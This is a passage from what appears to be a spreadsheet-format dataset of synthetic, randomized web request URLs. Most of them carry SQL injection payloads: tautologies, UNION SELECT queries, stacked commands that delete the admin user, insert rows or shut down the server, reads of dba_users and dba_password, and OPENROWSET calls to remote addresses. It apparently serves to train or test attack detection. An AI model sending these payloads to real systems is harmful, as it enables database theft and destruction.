    <t>/rd/qhjpok0mlhcq8t/no/nw4@zfa0nc7/yzypformaeh_sv/lnnqi7vairsgm12w/d3xpasswd3jv1vqx0.js?k1t2_d4x='++or+++'esi'+++++&gt;++'s&amp;i2o3hstlsin=n+nt@ln~&amp;grsr=gnf4trcdehy6f&amp;aeyphtnevcbdet=eg6mtbqn&amp;lontisamghh=ouil1vyu</t>
  </si>
  <si>
    <t>/re8opuramdbel/d1a3.shtml?netegnn4dten=oteowrzoelrsit&amp;4sww=561&amp;dlm4qsenotl=on5rinaaseieemoit&amp;dboa1=85&amp;etadwrdeh=teeeegexr0eniprt&amp;czcgielixxtrd8e=eehos&amp;saw=bp25y3&amp;f7zobjectrmbetweencsw=00133&amp;qdabemodei=lflw&amp;ohric=ggsteeedbgo&amp;e2ycrtc5='++++++(+select++top+1+++lnnoro0e+from++forealtf)+++++'</t>
  </si>
  <si>
    <t>/jtry42rtx3m7neathw/_qscriptximgcmd7d.m_/i4wunmhtreaeudid.cfm?1rhoreheeetpltf=shr3eva0&amp;gsncnetil=s75wfh&amp;d.@dwa9xterm7w=namrinsertsnoutmpo8&amp;ilxdhdr=edgbwrr_5uz_&amp;ftmagndls=moarrcg'++);deletefromuserswhereupper(username)++=upper(++'admin&amp;x1u0e=59&amp;mehx0met=825947&amp;hn=5&amp;jiq3it6edsc=[mi|tawgetoxtermetc&amp;mn9ncmnmrn=32&amp;cdhui=s9hsovt</t>
  </si>
  <si>
    <t>/modae/eiygxcf/e.rah9g3j8urhd269ab/a2r_/1noylog9elfw/4kbpswashds/liqlho0x7yi/kvvt.html?oneoafylvsayrkr=4855548&amp;44jidaiuxcbgrpn=+;hfe&amp;t1seanhnhldtans=e+eass&amp;txiirsacbh7i=o+i|1ssgx(ur+ae&amp;hxmb=p$9:orndu&amp;bg=lor2dseeg&amp;2dgw=bedaitgsgo&amp;dw3ps@vbscriptimeta2a=tstenaddfecpsd2i&amp;tos=74630&amp;sng8inonzgiu5si=c6cvtuie+4childnt&amp;_tmpb5=5119&amp;plu2likei2kg=chairs'+union+select+teoift+++from++dba_users+where++++name++like+++++'%&amp;dwa=5hr</t>
  </si>
  <si>
    <t>/iek.okzbcl4o3l10/qkdqmochavf/izdjlyu2j2n8ni9ug/5adchildbetweenghklbg5u.mspx?baq=+boot.inimoy?ss&amp;ooet1ee3tvoc=8044&amp;nfneu=tibnoptxtermtj@hu&amp;7ve=1&amp;vtusgzeet=1&amp;lhifat=ecrn&amp;2bdkaeanjasn=752&amp;alctvoenyoonsj=or++++'51lwlfii'++++=++'++'&amp;ohyensaif=emlexec&amp;crcwnfashs6hd=9gel&amp;senust=+~tianytet1ohesuttt9&amp;o5dqji5usaty=betweency</t>
  </si>
  <si>
    <t>/umr8-_8hz8/a8/enuoerjst.gif?ewp-cbin89qbv.yv=uzcahgci5v&amp;eeorerim3lowloz=hihsgde&amp;yaayeseq=+eg+faredr+a&amp;cr=853852201&amp;hav3b=917331723&amp;cqsa='++++(+++++select+top+++1+++wrtibq+++++from+++++3hhioov)+++++++'&amp;r9enabauritn4d=dnr&amp;pjlinkkvbha=see&amp;ajrm6lovpiqnph-=6d2esdett1zpennu&amp;tooi=leysovorhd&amp;aeki5sotasqs=62048</t>
  </si>
  <si>
    <t>/awvex@dgyb0mmt/em2ajq-ydj/ht0hta5tewebe3se/i3gz8asfrm0c/yejwvuy/tspcrj.gpqcckhi3ggq/9oyroy6tud33_hs.tiff?ux9jjhes='select+customer_phone++++'||'from++customers+++'||'where+++++customer_surname='''||++++lv_surname||'''+++and+++customer_type=1';</t>
  </si>
  <si>
    <t>/hstdarxowebe5pie/lea/is-ruprocessing-instructionwtswzzeu/idr/05ucr5ddipl.uos9ilhe.jpeg?dformjt='++/**/+or+++++/**/+'3u8'+&gt;+++++'s&amp;gsns5apschep=eiearnss&amp;0ds=ohnsnadh&amp;aoalnabr8jrr8t=8340852991&amp;uycrsisedti=17&amp;etyin5cgnoep2=d4ieiqoodu&amp;i06ktbysoe6ft=lq74q7w&amp;xnjewro=+n8rtdprbhwo&amp;pdeotraxpmitdit=529&amp;muzrqvn2it=luouryuele&amp;tftlcseerotsbw=netcat@cz&amp;.t9jmetaimg69=eaxjyugmc49&amp;lcm6uef4fomi=7a&amp;ore@qhbf6odo=spb'ii+t-ecopy/clidn&amp;gqno7g=8478887</t>
  </si>
  <si>
    <t>/iw_hk/aizgwq1z8kp6gkts-ves/aepseg8/ozhy/erd/qapegas4oerwl/r.uxgm0mq1xyuf03/wnduhxscript/ltcoho_hsv6rl8_cd/4optbgsoundcrl.php4?ea1egsn=a&amp;olroletls2=egymnullh~ilu-rubt&lt;&amp;pr3hefmoct=nw33z15tyv9f&amp;aentrldyrtyd='+union++++++++++++all+++++++++select+++rzn+++++from+++tsrnefan+++++where++++''+='&amp;tsuue=1gesemli+0ebnj&amp;eknycathps@=sx&amp;h5shefemhmaae=89074668&amp;iuie=childwyna&amp;h2=rut&amp;glnsom=winntinti&amp;edr4ocnrelost=0548069&amp;awcsgl3kninsst=4&amp;pic=](&amp;tsrayh=@bodyfhm&amp;arht=sit</t>
  </si>
  <si>
    <t>/eiemku/elod83hqz1k.jpg?gbsptmfh=30161&amp;e3e2v=30054&amp;ldgbaasnear=0491&amp;ehlsdoeo3jm0ye=68&amp;eo=eor+b0&amp;tdiocuehods=rjtodoem');deletefromuserswhereupper(username)++++=+++upper(+++'admin</t>
  </si>
  <si>
    <t>/ej2x0epu/5ieilxepedcm/iilfdimnernbbe/peb3lst/nszdi1xlr/tknp0krzdrscript.8@.gif?95inwmrpoyv=;+++++select++*++from+++++openrowset(+'sqloledb','uid=henoresvea;pwd=eeoawlr;network=dbmssocn;address=137.46.201.242,92218;','select++*++from++++rstgar'++)</t>
  </si>
  <si>
    <t>/ae2e.lr3@t@8omz9/eitrlia8rept3dse/svnajrrthzjgq/lliwi5utnttae/nk-rv9z6t4p/rjqlyu5@tm/wadx9ox./ebae0wsfd/hcu/vnbrj8erhd7aorthm6m/eoieix5centaogmee/aqdabmf.nty@sbh.gif?jv=zh/hi$ode4d&amp;j3weuhv=+c)5+ft&amp;bt5eunaiyh5=372172&amp;tdzp=rdi&amp;m_fopb-n=28&amp;osais=9523&amp;gaeocaansg8ee=ee&amp;xodcg3hgv=nesn&amp;ij62=le1rnbven=&amp;vceltim5eewon=+ras++&amp;a5luso='++++or++++'5ttem6hrrizn'++&gt;+'s&amp;6eheiheutye=cemndhheghlsede1e&amp;aeghasaw=4801413389&amp;kinputinq=59</t>
  </si>
  <si>
    <t>/ngooak/aahaueslpasdig.msf?nottaiedttd69=ids+1eqmo~ova&amp;nsxx=jfvp&amp;rintdn=';++insert+++++into+++++ad9eh+values(666,'lw','bite',0xfffff)&amp;nayoanuhs9i=00&amp;dxiphgd4euqe=jaitizaume5edvi4te</t>
  </si>
  <si>
    <t>/nzngc/oklkgjwftv1zzr/wozxqo/dhdyffadtjnzh3vuifs/fp/usdtharhntl/symmqefdc9shnv/q50nwi@uku/71ncs_/ec/toubk/yldkj-.htm?cclqdtleecaqohp=rsltcfemdywotyei&amp;nnco=034&amp;wie2grrthrhrtb=7668670&amp;%ueat_snform='unionallselectfieldfromventolilwhere''+++=+'&amp;ehlh7oni9i=l&amp;snvtheoip=dhgw&amp;bzwmphttps@bqxmls=+t&amp;hmuoa=9nbbmey&amp;tlsd=eeia8nrerpnina</t>
  </si>
  <si>
    <t>/xk6autoexec9.p2div8y6v/tyhajqs/tgdu9a5ymb-am/vfpud2ey0yvnlbmwue1u/siqk.png?ata=40&amp;tsi=70&amp;eoeotett=cicw&amp;9desm=peelt8rr&amp;hsarh0saeduiw=&lt;aw&amp;rr=5354276683&amp;cooso=imoofnsfnari0u&amp;abromo_bo=3ed3kt1&amp;aesserehuioadz=8+&amp;o58tabexyasrs=neobx&lt;eim8rhaving&amp;anlny=dencha'++);+++++del/**/ete+from++users+++++where++++upper(username)++=++upper(+++'admin&amp;y1letdohotfne=a-m+h3a</t>
  </si>
  <si>
    <t>/9m.5m_/io5alphpxj5xmdiv/2a1e6oi8eltt/2iyinemeug/yckmxil7c1bbepkkjaip/thxw-ctelneta.jsp?ea=2549&amp;hwstib4a=3hwrp39elr&amp;httision2e1nmav=907&amp;niutyncopyb=tee&amp;nnv8hs8eb=uhnlofncsi&amp;annmoqi5tc=l-echke7&amp;ntwvrrur=68&amp;ietiau=edocument&gt;l&amp;zq9amb=1crtmrdit&amp;ruoe8ne=600187566&amp;vedztelyige9=9054&amp;14oeddeudp=68&amp;dhumailc9frq='++++)+++union+all+++select+++++1380+++++from+++mr++where+(+''+=+'</t>
  </si>
  <si>
    <t>/r6hdkqj5b-oqmj.tiff?abanodewml=or++++'sstxg'++=+++++n'+++++'&amp;vehoniig=ptiphphn%oatad&amp;ctwtf=7991&amp;iiecgeh=161&amp;hsnoedndi=rti</t>
  </si>
  <si>
    <t>/acadl@ef/npbmd54rsrzige6kp.png?vaeihedenuwe=9&amp;wieuncnihlhyl=qwer'+or+++rhol9e_v.account='f4r@sieo4i.com&amp;d4waotlclot=13867&amp;u8h=cr(&amp;nlsenc=hxi4ii3ods&amp;ioc0p=2&amp;iflfa61n=ces0u&amp;eeae=919357&amp;vftp.r=sjpbh&amp;ozboa=16170&amp;errzchenocne5=e5nyeeohjilniat&amp;dt=6qmzop2urk&amp;ne43xo05eut=amw7g88o7&amp;m0pvea2dpo2mana=jtselectoa</t>
  </si>
  <si>
    <t>/.3linkajcuu/wum42ayotuhlehmim2iw/wh3r3z6cycrmeta/wba/l0a2tqd9arso.jpeg?vr@l=')+++++union++all+++++select+otyii++++from+++oqns9+++where++(''=+++'</t>
  </si>
  <si>
    <t>/ormosjaecvjwk/ec/5xq8iljfxp_biny4yy3/neaurwli.html?advgtcecaetpmue=k&amp;da=+++++or+++2+++&gt;+1&amp;setgkruresbreas=3sw3gtmfp</t>
  </si>
  <si>
    <t>/ga7agwtu5p/rsc6hgxgoafzo0qv/tupu-qjqozpe7p77/ebtxk/ivnetcatinputchildhtacces/pussfs7olkihetomrs/oejm2cgk55.dll?mvdtiohaalle=ucdiu.&amp;9n9tmdbiihn=ntlesosamt2&amp;tm0m3hlav=';+insert++++into+++oeaaarwn++++values(666,'nrdene','aiun5i',0xfffff)</t>
  </si>
  <si>
    <t>/rqzbwffns6yw60/i-8rd2s-3gqp11q/moens/wov/ouq1insert/elm6nnrbg3trtanfnlre.jpg?iyuzaiee=&gt;;aaccess_logmoar&amp;sock_stream3aohs=havingk&amp;nodedusrh3uzehe=hwanseom&amp;7hsn=e8ioty2hrtgtwui&amp;aa8iob8eldsas=n&amp;oawe9aruwaruy5=aiigaoy&amp;ecuwoxpansneohe=865&amp;eeipifcssepml=51766&amp;afrstntnhinan='++++or+++++'8fta'+++=++++'tc'+'melw1'&amp;nnzr2heoe=49&amp;biusau=etaae8&amp;0te=6hjbw7tt</t>
  </si>
  <si>
    <t>/a1bhmusvz_alrvhdf9a/m2trnvxk/vwf8ruurisooto8t0u/tm6cbkeuo/vdltm4ccnbe3cinartha/ec/fwxhhvbscriptmybin5r/t7tmwahav5x8otlb/cpr5uer0/itb8santdrsn/rxkode.htm?hrjededaee=wrrre%teiwr2ni&amp;e7retthnlo=sxc&amp;ah1a=6100&amp;nihshs=1428099&amp;ec0heelkf9u='+++union+++select++sum(mdreo)++++from+++qscraw--&amp;oermhreyt3hre=9774&amp;oprettd=07&amp;ifdocumentemuameh=4owei&amp;lpsat5saenr=0707&amp;rraliism=col&amp;7rohiwewdgdwx=h8</t>
  </si>
  <si>
    <t>/nt/tcdridzhbtzutt4reweo/eh4tt/klqfrujl/ifsjowl9neejzgi/ek0nl1@_6tghx_lz.js?samwc=4886044&amp;d0rqeuea='+++or+++'r5mpy5r'+++++&gt;++++'s&amp;ddh9rr=c&amp;wtgdvae3wthr=9ya&amp;ovs5qcsen=a1eposition5e&amp;d6-udvahttpsx0y=ibxetdaehyojc&amp;ftpbvw8=dlw_h40&amp;itet4mn=s&amp;oaenolqxidrnl=inrtg</t>
  </si>
  <si>
    <t>/ytn83oasgneh/uoqnh0t9dc0b/5tapowlrfehosivheods/xeqen6chtdemuitt/b2v-ovsp-tlwaj9bzr/wbw/ly6f.html?nbwra5kh=npasswdmtirheolv+mlike]e9syi&amp;cb5efhcranj=022458&amp;zqneoi=teneya&amp;azl=98430780&amp;pe0='+++++or++++'aiixa'++=++++'tap'+'tel'&amp;cptoeesahwe=6vroi4+nen&amp;-home0diupdatesb=aourii&amp;rese5tukjz='hha&lt;+eete&amp;tnarla=prd&amp;hethsz0cehae=tsnnxrsam5ba=sf&amp;ntnd0=35928179&amp;ggprllduocc=6enha3ae&amp;mrlw=29037&amp;tuteaeb=lolrnfadrcs</t>
  </si>
  <si>
    <t>/hlytylrsrln/6k46jfcawholez/olxjhm/epwy8b/auv/eslg7y4ihnijx/tfobhaxt/4udhuxf/yej/ceh4el/nlchild/qobfeie.tiff?zc2lxm.=')+++++union++all++select+++++'eh',5,32,'natoi',1364+++from+++++irmtbatet+++++where++(++''+='</t>
  </si>
  <si>
    <t>/wtmmwedearaer/gyihv7joebcsehrfiitn/nttorspls1n/tsndnectce2n/9azxg23nuz/9bfv-iwci/c2orogi/e@o/lp/dqfqlinkjiu0/y8cj1asp1wp3/ozv.js?twz2ncrkrqe=in+&amp;oiaedgxp=das7m&amp;odatd=desen&amp;rcse=xc9setsnn&amp;oaopw='+)++++union+++++all+select++84,0,949,271,424+++++from++t9hyrhuddt++where+(++''+='&amp;xi=0hhh9&amp;mafroumtucanu2=wblocationb&amp;or4iiymoahrzu5b=ur3r&amp;n9m=98002</t>
  </si>
  <si>
    <t>/nuhlpni3j6/hack@3ac7mxmff/51mv@pn7/ph/edemoenboo3g/6hdnh/mo/5ann9gerginlternos/mailad/nortde2t.bin?ircuctlrs8r53cq=emra/6c1a&amp;cn3hhtilyas='+and+++user_name()='6ask&amp;ertofialplhe=25&amp;n8tmnxoeebemoso=2869410</t>
  </si>
  <si>
    <t>/sftss4r/xdxj3a4njotvt1m/e5newijaerselw/lj_/z9b.znd/czo8o/bvrswdocumentk/7esmaq/x1ddih/6s0pq/nc8shee/kleya40vlrsjcp1f.bin?slndiprimr5heyx=x7rc6haaluorss&amp;0ajn0hfein=+ne+xtermiapnh~cmetaeexec6nph-st&amp;i3iiwyrtbhs=wdsnib&amp;deamoxshao=e8tb&amp;$i4hosldd+usoei&amp;ftniao=573389&amp;nriei0atm8heeh=nr9odzushht3&amp;netcatnkzzssgxdh=vsrscede&amp;frehewbpceui=lntiethuhl&amp;esyifeisore=5wdj@u_lz68l&amp;bsbjhrehoeyhnwv=dehm&amp;zaabr6esstewyre='+++++/**/++++or++++/**/''++=+++'&amp;@libxhqd=ncohoaw&amp;df.0mp@aw=47023310&amp;b1e0wnigoeyye=evtr+'m0;gandp&amp;jr2tibgon=1ixot</t>
  </si>
  <si>
    <t>/zv0u.cgizrd.82g/h2njhqv0qecetcdp.gif?8zp=diaqfe)cheusryd99&amp;ntol9ciw=bm&lt;+stn6&amp;tdvctrfdoyav=leso9hssea&amp;bi1frxq=d&amp;uyeclu=onr&amp;hzqzvnetcath=frkjv&amp;ixbeow200=841&amp;t7ea=ylnnwd6uoysstyl&amp;0tn=t4r&amp;mas=pasnservicesntnise;lh;having&amp;wgetvnsa=uek&lt;tie&amp;tbnatci0a='+++/**/+++++or+++++/**/''++++=++++'</t>
  </si>
  <si>
    <t>/9nk66z7pjr/uc5z161joubuzjibmad/ls@_4rvti/doatsst/eriaevtefhitaini/ii.css?amkntp=naf8hmx8pfnkor9e&amp;1sut=xxb1yy&amp;ran3nets=um+9lna2dnin&amp;ehmboeeoi=';++insert+++++into++eit++values(666,'fa','haen',0xfffff)&amp;%us1z=rh8r%t&amp;rit2eoeunrtqhao=]spasswdp&amp;5oeelxnjknsoe=6i6vghpzcrbm&amp;fg2v0au5=ps5ejdt&amp;tdh23i=ot0a&amp;umoloti6oyt=ua_virpc@&amp;isfdre=ireiem</t>
  </si>
  <si>
    <t>/thbnurche/gss/efeel6s/wnandh4gje3echyai9/3ofm.aspx?lotvs9necn=59&amp;iitnn='++++group++by+users.id+++++having++++065=065&amp;eoiso=sisosiooosovo4&amp;2jyxwjhg=rca&amp;oguo=sknaf4&amp;z5sten6tred=w&amp;co62eoonrm=20642&amp;iiypar5h=hi680qqq</t>
  </si>
  <si>
    <t>/o5yxafmljg@-qtfbs.hi/rke/5ydon/tr2k6ihrv_2mxu0.jpg?goo=aru0su8l&amp;r9ess9huhh=5vwfzp&amp;izw7hcataoz0a=ah&amp;n3noheenais=02&amp;pseopzrlscigtsa=')+++++union+all++select+++0855++from++1eyzq++where++++(+''++=++++'&amp;lebtrnoa=5487854753&amp;axgtspbexu=6&amp;tds=4970&amp;4oqmoe=at&amp;lwmecmdinsertfwm6fj=iuq&amp;aiyegsezydy=02&amp;erdlfaea=&lt;b1&amp;icaekelnypj=5&amp;npotink=a8ertum&amp;shsm8l2toaowy=1</t>
  </si>
  <si>
    <t>/lrt0jbadvhtmd3jd/loellustsiceds/hjibm/ienb/xbbjv5eessttp6o/etuw/tbyzg6z@tj/i2treahsv9ry3del4iep.exe?cecdioj8pvtens=m&gt;rah7toiorie(sne&amp;nbvsye=niydsl6gh&amp;i7sof=0&amp;qtkvige=rf&amp;-qlojncgsystemc=vyobgax$lrtezox&amp;qdaro3=znzd001yu&amp;ehlitzfaesnrha=gz&amp;b55lxrntgoh=936284&amp;onosvm=chairs'+union+++++select++++maae2e++from+dba_users+++where+name+++like++++'%&amp;xlti=589007&amp;6@052oksz=216362&amp;htea6m1qe=mnbewf</t>
  </si>
  <si>
    <t>/notn9/var5sseqtuceir.js?bnio3ssjty=')+++++un/**/ion++all++++sel/**/ect++'lessaflnoe',3,9,'oejlas',9++from++++29++++where+(+++''+=+'&amp;x9sock_streamjscscript.ifu=ctydl</t>
  </si>
  <si>
    <t>/ianinmgorz1gi2oesi/kalh/6ooyroemqchsowcdf/aobs0s4l/jnr0unionkipptr/tyiit.t5yucussfo_/ifghmtpqu1@sjgga_jq/bg/ediaonh5a4ecsaei.jpg?qufeopeo=10&amp;eidoi7gclefuj='select++++customer_phone++++'||'from+++customers+++++'||'where+++++customer_surname='''||+lv_surname||'''+++and+++customer_type=1';&amp;joesunw5=s$&amp;b1rmrctro5mdo=9</t>
  </si>
  <si>
    <t>/d557nwi5ey8/rdh3e/seofx/lhsvimzwf7v3fdab/igeogzjii0be/6h/sm/57yjzgx_x8t/rb8j_x90pqfgv0/0rd0lwoad/enc6n2i6etn8uyim7.cgi?q.rq0.passthruph3=4496039&amp;oeeuiijat9=lx6t-accepthublv&amp;bc4ev1dafs4i4l=or+++'myhrd'+++++=+++++'+++++'</t>
  </si>
  <si>
    <t>/rm1fi8_uevk9/2seiyciase24/-aiif@xu._9catw/rcunesmbtccteeki8/gtn7/iamil/i@gmb0ubpn_akrefibf/paiue1/o_xfxjng@wzuhfs/mcttor/o4snpy.4ne6-.jpg?essfoea1gefice=4940290&amp;eoef8eu=geekn8nkrreyws&amp;jrr=si+o6dcedee&amp;esgat=vtiiu3nydqm&amp;y89nosetrm=whereoqy+&amp;mtaep0iieaz=8&amp;nh=95&amp;otlopue='++)/**/unionall/**/select/**/23136/**/from/**/sraltlento/**/where/**/(+''++++=++++'+++++/**/&amp;laa3ih94=6qkvkc&amp;ricpet03lnpgr=3901&amp;ztestodrseaw=:iag0&amp;l1f=01&amp;eryuyspett=gtwaeldzrennuzs</t>
  </si>
  <si>
    <t>/opositionfl0boot.inidivgjmkb/aidanspe/e1eaesst1.swf?nhyswaitm=lfagiutdor&amp;gizznemh='+++)+++++union+all++select+++hoelhe+from+++++rto3ec+++where++++(++++''++++=+'&amp;5esoilmks7sh0s=7yb@oa4qxb6&amp;hincludenr.jxml4n=qstdinef&amp;e23ssena=gqm1tfwgq&amp;usgne=s</t>
  </si>
  <si>
    <t>/ti.zrb_j0og4j.ena/em8tmia/tcs.bpswxew/ta/litln9rxuyu4woeaggd7/x5aukrsbgrgqfs_/xehsbvkservicesti0-cq/t9phhwmybcf6ve959g/i9f/ij0vbqh/eta4snwa.jpg?t-jrcckhomepi=euoelhyeadttoo+nn\\&amp;finih=hktslc&amp;y3=bil\\9&amp;nnsafori=tykqm-u@-ho7&amp;olrmanht46=gffijjhrw&amp;semz08=chairs'++un/**/ion++sel/**/ect+++7gorj++from++++dba_users++where++e0++like+++++'%&amp;tsjbeh64enanm=ayrcoj&amp;nnuq4rryi=es\\&amp;wieorldee=m?&amp;fr8n.cdtelnet=tdaiqlqsystem4eaelu&amp;c0len7gpn=uhs</t>
  </si>
  <si>
    <t>/tait2x/i0wnntjg8w/erd5jfrlmdm/6kqirkoghtxp_/eo71sunzm/ox2n1/hainnoeaegaatbwshii/sxmjagsystem8phj/act/tz-/nng0thegnonue5ht/tnpureueehbeins8seaq.aspx?e7anjn7mfaane=250186&amp;adb2oi=4&amp;baatsbini=o%n)&amp;etgtfd=15194&amp;x8fpcvrmp='+++or+++++'stkuetant'+++between++++'r'+++++and++'t&amp;ceae=iss&amp;gfrom6cug=h&amp;elya7sssesa=+i++&amp;lehwe=rt&amp;kfku2a1x_xi=\\3acyubxnlii6i|&amp;teqkytnlruut=t-5jkpt</t>
  </si>
  <si>
    <t>/s96/0pyymfbpasswdjbp/6scp2ey3@pmlfx/diqo3s2a_0atk/bk5flb09kjs2wd/00lwindow.opentsxtns/ererioeptua/ouierlecte3eoi/t2lu.mspx?v.4i=pgpaaa+6nnph-fenph-rlzasock_streamn&amp;ix=3&amp;ntdeoav=rt&amp;wrqe=362&amp;ciid9tlhrtic='++)/**/unionall/**/select/**/632/**/from/**/fnhel2y5/**/where/**/(++''++++=+++'+++++/**/&amp;eilg=c+&amp;sndltiyofznnh=eaviht&amp;qf9zsjy-vwc=-c+=winnt</t>
  </si>
  <si>
    <t>/hxrteecdmaeotede.php?i5bnseyeat6ree=raeacruiqrbavf&amp;eio8qr=afa&amp;ldsrlqpsoitdgsr=/ni+s(h&amp;pipmts3=otsndwg+i3dris&amp;rsfre=-&amp;e0ocm9-x_7=hftaenhny7s7&amp;t8rm-zmfhttpsk=07&amp;ehht=r]eto&amp;ghsscript9k9fi=12974&amp;ewdxdlo3bcw-=mwl8koadtdna&amp;soawahl=0867641&amp;2jfv8dno=or++++'tx'+++++=++++'sim'+'ple'&amp;lohule=150098557</t>
  </si>
  <si>
    <t>/eteie4lvrba.shtml?7st5taiaobtnb=6netcat2e&amp;owhenkjb=nnhay&amp;bnsupeenrlw9dae=e-aghp&amp;uhfa=albinx%+&amp;jmmfwrd5='union++select+++password+++from++dba_password;--&amp;6f5on=hvn9rquthw&amp;moste0hyii7=ho24&amp;g4s=kksido</t>
  </si>
  <si>
    <t>/aeatir58cusbseamd/r_xagz/en5zke7rq.aspx?sai9h=burk1ch3unv&amp;dqtuisw=sandh&amp;gmhlhnis=26798&amp;7eqfi@enahxy=5ew5&amp;auonclqsn=|sud:&amp;9wptthtqnetcat=ry0j2cy&amp;uwzndkp57r=nit'+++);+delete+++++from++users++where++upper(username)+=+++upper(++'admin&amp;htrr73sn=ela9&amp;gtssc16decwl=uuhfge1ehear8&amp;srbu5azj=36&amp;tnitmusacsem=74</t>
  </si>
  <si>
    <t>/2z1dhx25rirqj/oedysoaontdnlns7wros/uorhi5nlheao/eh/ity/havingcizadmin/wsd4/mu/ijbkam3.54iqcjfievt.shtml?1ald=nmi0&amp;imo7as=')++++un/**/ion++all++sel/**/ect+++'l33eptb',22,6,'akeavtt',9+++from++++s3t+where+++++(+++''++++=++++'</t>
  </si>
  <si>
    <t>/th1/asn76es/rszhteinnbh.htm?zedebqeo=or++++'s3ho'++++between+++++'r'+and++'t'</t>
  </si>
  <si>
    <t>/e0euheoe4i6ny/upr0y-jes_dl7rvrx6s/ehuwip7ws0ea0edkis/stiekswrc/s.kor/isyaq_wd4fz-ld9fylz/q3nilr/3ancc8p5hy/ehece50de.js?wucmdsjetc3dp=or+'sa5e'++++between+'r'++++and+'t'&amp;p.@jhxw4zbetween=iw.7ek6x&amp;tleged2tva3aia=ooalli</t>
  </si>
  <si>
    <t>/tj4em1bmewlzmtbdb.php3?ys3=naaauq3gu&amp;741daxr=&gt;si+o&amp;puj7dh=u9lyljqzqe&amp;ex3lolj9ns7cpoa=449717&amp;zmbnce=9&amp;tdpa=6637128&amp;jamed=lvshengc&amp;ooe=ss&amp;rdpdie='++++++++(++++select+++top+++1+hutl7une+++++from+tion)++++++++'&amp;l3eqhaqty=ao&amp;l9sisa6ee5o=3gcopy&amp;</t>
  </si>
  <si>
    <t>/ead7svsrs6ib/at2smicttle5mxe/ej_xqtexemw/tc/eenea8eiechcrktcsxl/exj1syn@fcadshflzv_/pauv_/it/6lepiuyieteesuale/nhoefoise5cc5eohct.dll?c41ru=edcpasswddrwtlon9niperlu+ng&amp;icotl=31&amp;se4aaihte=or+++'atd'++++=++++'++++'</t>
  </si>
  <si>
    <t>/d0uv6ap6guzle_telnet/slog.acceptpasswdtr/seey_rep1icoveyiziy/t1r6woewtedd/h2b_3u.yktzjb/v0iboot.inippd.bin?gbrottbt=';+++++shutdown--</t>
  </si>
  <si>
    <t>/qdhiastbnceoe.nsf?modit4tvapooh=14450&amp;ttrony=5&amp;-ycat4u8zjq4ah=veiglos6iaqng&amp;atkunioncv='+union+++++select++@@version,1,1,1--</t>
  </si>
  <si>
    <t>/t_/na099p0.avk/owuewink@zqczacldzd/oq3sntleec/dc60.sh?lsrh7oet=221842619&amp;hajtperlu='+++)+union+++all++select++sc3auw++++from+yy35++++where+(+''++=++'&amp;te=neaefv</t>
  </si>
  <si>
    <t>/jvrplf/tuiuxy/guyao7x.ag.2med./6yboot.inidocumenthngok/enavalldlnmb95njpa.cgi?nbs=yaoimap6yoj&amp;xcq@p=dr7um9nhc&amp;fikuuserw3=|kto'qp:tdggroup+by&amp;dmrn5bm2yer0='++)+union++all+select+++++ysfb2ant+++++,++++tpiso+,++xsoi+++from+++++ei8pvtlcq+where+++7oan0t+++not+in+(+'6rttnpalt'++++)+and++++ltspn+++++not++++in+++++(++++'mc'++++)+++++and+++''++++=++++'&amp;u4gkao=478555</t>
  </si>
  <si>
    <t>/nlolni0ytb.aspx?ajig0g=relabodyefrom|saygwinnt&amp;u4zi='+or+++'reoew5w'++++=+n'+&amp;ez66auel2=rxta&amp;nno=5916&amp;m1klawax.-=snan&amp;czkih58asmeb=abt&amp;dhyix5=n&amp;tfntho8iio=639&amp;tettrrdslwaegdi=60021474&amp;aesjrrdsnc=copyedcliuwgreco</t>
  </si>
  <si>
    <t>/tscniyw/access_logv-oe8/ec/teii/1y4/otsbpsliaftus/5hy.egkuofx9n_mv.sh?ioieuowt=npne&amp;nsharmti=|o&amp;ud1abtlraaeo=2707&amp;kkl5ft0ip='+++or+'0nz54a'++=+n'+</t>
  </si>
  <si>
    <t>/do/ahyas3dsuo3g/tal.dll?ojkfinpfa=5648&amp;hcnolib=&gt;eem7w6h8]=l1/&amp;a&amp;enhwqn4teh=dn8mailstdin&amp;anota='++group++by++++users.id+having+++++0118=0118&amp;sxmdmtdosw=0952&amp;hysamc=j6pk3e-it3q2&amp;aattl=e45sm&amp;or=1rftps5drm+iticsye&amp;plela3optloidse=8f4xu</t>
  </si>
  <si>
    <t>/dearrhl/ywgsm_.lqqxnhu/viaael/ahtymto4ersc/inoj39owarlphtiouqy/tqkc80oj5hb/r2gn0to/hcr/66tddp/21nyvs.tiff?heyidrncheicni=eopt&amp;i2kimekd=328&amp;w0ioee7nreysito=n9rm&amp;r&amp;hatl=edmygphhhse2be&amp;wwr=92429&amp;v7iodrtjrba=tnpd&amp;0esoerbsgaepy=and++++0&lt;&gt;(select+++++count(*)+++from++++teoel++where+++++u6hnlak&lt;&gt;)&amp;lhbgsoundqzox8x=/h+nogh+t7owinnt</t>
  </si>
  <si>
    <t>/xato4@/gi@/sa/butjtd86mqqdg0.y/ae6yll3rhr2aidsi6s/ndjqxs1erah.nsf?roblwg=3686805051&amp;hhmonryby=hg|positionnnii&amp;dea0om=otn&gt;s&amp;mppdozwindow.openigprocessing-instructiona=s&amp;rkfdocument6bb=t(5hg6e4ish2icneoyt&amp;brrr='+++++group+by++++users.id+++++having++68=68&amp;hr=2378</t>
  </si>
  <si>
    <t>/1tbi8jg2ld.pl?inwanuta=90016947&amp;@glsguak=tavyor@zx1&amp;hbpop.f.y5=50108&amp;kisnltabyoc1=18941738&amp;pejwindow.openmxocautoexec9y=b4arnsuti&amp;5surnsa7hhaxene=tdrhr&amp;nlkottlsdsemace=fbws_&amp;resfw2tguywetue=13&amp;kreplace-r@8=w+68&amp;soiso=el\\passwd&amp;esg='unionallselectfieldfromlatonswhere''+++=++'&amp;fii=wu+1c&amp;ea5usi=6593151</t>
  </si>
  <si>
    <t>/z46zn0bd_f./t.ok3r5m1w0kcaduj/e6w4t/npn/upx7zdd_axke-y8ovgy/lk0x1uzs/m1/e_qwfewmtfxx8aosp@/sxihgtgiks2os0/as.jpeg?ydtt6nmue=815410&amp;seetrazdsemr='+or++id++in+(+++select++++*+++++from++++user_db++)</t>
  </si>
  <si>
    <t>/afne7o2n/rtk6rtz8/see6epghslti6edssrt/1emensduz/q8..htm?nlthsqziu=opxf6ai-&amp;emshjripcd=odbuht7hnrt:a&amp;pcurdinnge=45859&amp;ce0mtknkdemob=;+insert++++into+openrowset(+'sqloledb','uid=lchrel4;pwd=28;network=dbmssocn;address=1.41.142.193,1433;','select++++*++++from+_sysdatabases');++++select+++*+++++from++++linkedorremotesrv1.master.dbo.sysdatabases&amp;6vaj8ouet=350283</t>
  </si>
  <si>
